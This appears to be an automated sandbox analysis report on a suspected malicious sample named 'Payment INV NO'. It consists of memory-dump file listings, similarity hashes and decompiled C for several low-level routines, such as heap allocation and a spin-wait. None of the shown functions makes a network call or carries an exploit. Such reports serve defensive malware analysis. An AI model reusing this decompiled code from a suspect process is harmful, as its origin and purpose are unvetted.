                                                          0x017c5ae3
                                                          0x017c5aeb
                                                          0x018071ed
                                                          0x018071ed
                                                          0x017c5aeb
                                                          0x017c5af5

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f558579c7d04b892cb9b86d3cdcdcc8037a5254e996e847c68f59fddfcb53ae
                                                          • Instruction ID: e3d5bab32ce31ec7fa5eed63dbbab34c5f2dcc973a23de587e30a5211a8b190c
                                                          • Opcode Fuzzy Hash: 9f558579c7d04b892cb9b86d3cdcdcc8037a5254e996e847c68f59fddfcb53ae
                                                          • Instruction Fuzzy Hash: 3901D6316407499FD7269B1DC888F6DBB99AB01B20F00425AFD548B291D7B5FF40C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01791BE9 Relevance: .0, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E01791BE9(void* __ecx, signed int** __edx, void* __eflags) {
				char _v8;
				signed int* _t9;
				signed int* _t12;
				void* _t14;
				signed int* _t15;
				signed int** _t22;

				_push(__ecx);
				_v8 = 0x10;
				_push( &_v8);
				_t22 = __edx;
				_t14 = 0x10;
				if(E01791C45(_t14, __ecx) < 0) {
					L4:
					_t9 = 0;
				} else {
					_t15 = E017B4620(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					if(_t15 == 0) {
						goto L4;
					} else {
						 *_t15 =  *_t15 & 0x00000000;
						_t5 =  &(_t15[2]); // 0x8
						_t12 = _t5;
						 *_t12 = 1;
						_t15[2] = 0;
						 *_t22 = _t12;
						_t9 = _t15;
					}
				}
				return _t9;
			}









                                                          0x01791bee
                                                          0x01791bf3
                                                          0x01791bfa
                                                          0x01791bfb
                                                          0x01791c01
                                                          0x01791c09
                                                          0x01791c41
                                                          0x01791c41
                                                          0x01791c0b
                                                          0x01791c1e
                                                          0x01791c22
                                                          0x00000000
                                                          0x01791c24
                                                          0x01791c24
                                                          0x01791c27
                                                          0x01791c27
                                                          0x01791c2d
                                                          0x01791c32
                                                          0x01791c36
                                                          0x01791c38
                                                          0x01791c38
                                                          0x01791c22
                                                          0x01791c3e

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
                                                          • Instruction ID: fe567503f9d307e48829f4e0e4f1da3c04036aa5b3b931d2724c0cce7f04327a
                                                          • Opcode Fuzzy Hash: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
                                                          • Instruction Fuzzy Hash: 30F02B31714209ABDB18CF29DC00B56F7EEEF99310F1080789546C7290FA72ED11D354
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D8EC7 Relevance: .0, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E017D8EC7(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x188d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E017C4E70(0x18886e4, 0x17d9490, 0, 0);
					if( *0x18853e8 > 5 && E017D8F33(0x18853e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x18853e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x18853e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x177bc46;
						_t48 = L01817B9C(0x18853e8, 0x177bc46, _t67, 0x18853e8, _t70,  &_v140);
					}
				}
				return E017DB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                          0x017d8ec7
                                                          0x017d8ed9
                                                          0x017d8edc
                                                          0x017d8ee6
                                                          0x017d8ee9
                                                          0x017d8eee
                                                          0x017d8efc
                                                          0x017d8f08
                                                          0x01811349
                                                          0x01811353
                                                          0x0181135d
                                                          0x01811366
                                                          0x0181136f
                                                          0x01811375
                                                          0x0181137c
                                                          0x01811385
                                                          0x01811390
                                                          0x01811391
                                                          0x0181139c
                                                          0x0181139d
                                                          0x018113a6
                                                          0x018113ac
                                                          0x018113b2
                                                          0x018113b5
                                                          0x018113bc
                                                          0x018113bf
                                                          0x018113c2
                                                          0x018113c5
                                                          0x018113c8
                                                          0x018113cb
                                                          0x018113ce
                                                          0x018113d1
                                                          0x018113d4
                                                          0x018113d7
                                                          0x018113da
                                                          0x018113dd
                                                          0x018113e0
                                                          0x018113e3
                                                          0x018113e6
                                                          0x018113e9
                                                          0x018113f6
                                                          0x01811400
                                                          0x01811400
                                                          0x017d8f08
                                                          0x017d8f32

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0af9a3800d24a6d4fbffa8829fea307604f07470270e4cd3047bcb3f7c5da4bb
                                                          • Instruction ID: 2aa1b5986ce59d75a541123e4fe981618f054ee554ef1eaba7d93d301a704126
                                                          • Opcode Fuzzy Hash: 0af9a3800d24a6d4fbffa8829fea307604f07470270e4cd3047bcb3f7c5da4bb
                                                          • Instruction Fuzzy Hash: D6F0B431A0030CABDB20EE6DA9C5E2AF3BDEB85B14F9100AEE60593144CA705E048751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C6B90 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E017C6B90(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t11;
				signed int _t12;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 != 0) {
					if(_t19 < 0x1fff) {
						_t19 = _t19 + _t19;
					}
					L3:
					 *_t21 = _t19;
					asm("rdtsc");
					_v8 = 0;
					_t12 = _t11 & _t19 - 0x00000001;
					_t20 = _t19 + _t12;
					if(_t20 == 0) {
						L5:
						return _t12;
					} else {
						goto L4;
					}
					do {
						L4:
						asm("pause");
						_t12 = _v8 + 1;
						_v8 = _t12;
					} while (_t12 < _t20);
					goto L5;
				}
				_t12 =  *( *[fs:0x18] + 0x30);
				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
					goto L5;
				}
				_t19 = 0x40;
				goto L3;
			}









                                                          0x017c6b96
                                                          0x017c6b99
                                                          0x017c6b9d
                                                          0x017c6be9
                                                          0x017c6beb
                                                          0x017c6beb
                                                          0x017c6bb3
                                                          0x017c6bb3
                                                          0x017c6bb5
                                                          0x017c6bba
                                                          0x017c6bc1
                                                          0x017c6bc3
                                                          0x017c6bc5
                                                          0x017c6be0
                                                          0x017c6be0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017c6bc7
                                                          0x017c6bc7
                                                          0x017c6bd0
                                                          0x017c6bd5
                                                          0x017c6bd6
                                                          0x017c6bd9
                                                          0x00000000
                                                          0x017c6bc7
                                                          0x017c6ba5
                                                          0x017c6bac
                                                          0x00000000
                                                          0x00000000
                                                          0x017c6bae
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                          • Instruction ID: fcd9351b081d977c95de877d8b3c0e0bbd2e4fd236fa871fa9e4bf51d218590d
                                                          • Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                          • Instruction Fuzzy Hash: E7F04975A00208DFDB18CF48C690AACFBB1EB84B10F2440ACFA069B701D6399E00DB44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BC577 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017BC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E017BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						L018688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                          0x017bc577
                                                          0x017bc57d
                                                          0x017bc581
                                                          0x017bc5b5
                                                          0x017bc5b9
                                                          0x017bc5ce
                                                          0x017bc5ce
                                                          0x017bc5ca
                                                          0x00000000
                                                          0x017bc5ca
                                                          0x017bc5c4
                                                          0x017bc5c8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017bc5ad
                                                          0x00000000
                                                          0x017bc5af

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe055efac2bdef57122e7ff8f0f127ca8d8a85cbf0ac37fa03820d240325c7e3
                                                          • Instruction ID: eb12e05f384261cac3509465e1bafba62a240412a2253d12e45228c923409369
                                                          • Opcode Fuzzy Hash: fe055efac2bdef57122e7ff8f0f127ca8d8a85cbf0ac37fa03820d240325c7e3
                                                          • Instruction Fuzzy Hash: 51F09AB29157909EE7378B2C80C4BA2FFE89F05670F74C4A6E61A87202C7A4D880C261
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D927A Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E017D927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = E017B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E017DFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E017D92C6(_t11, _t14);
				}
				return _t11;
			}





                                                          0x017d9295
                                                          0x017d9299
                                                          0x017d929f
                                                          0x017d92aa
                                                          0x017d92ad
                                                          0x017d92ae
                                                          0x017d92af
                                                          0x017d92b0
                                                          0x017d92b4
                                                          0x017d92bb
                                                          0x017d92bb
                                                          0x017d92c5

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
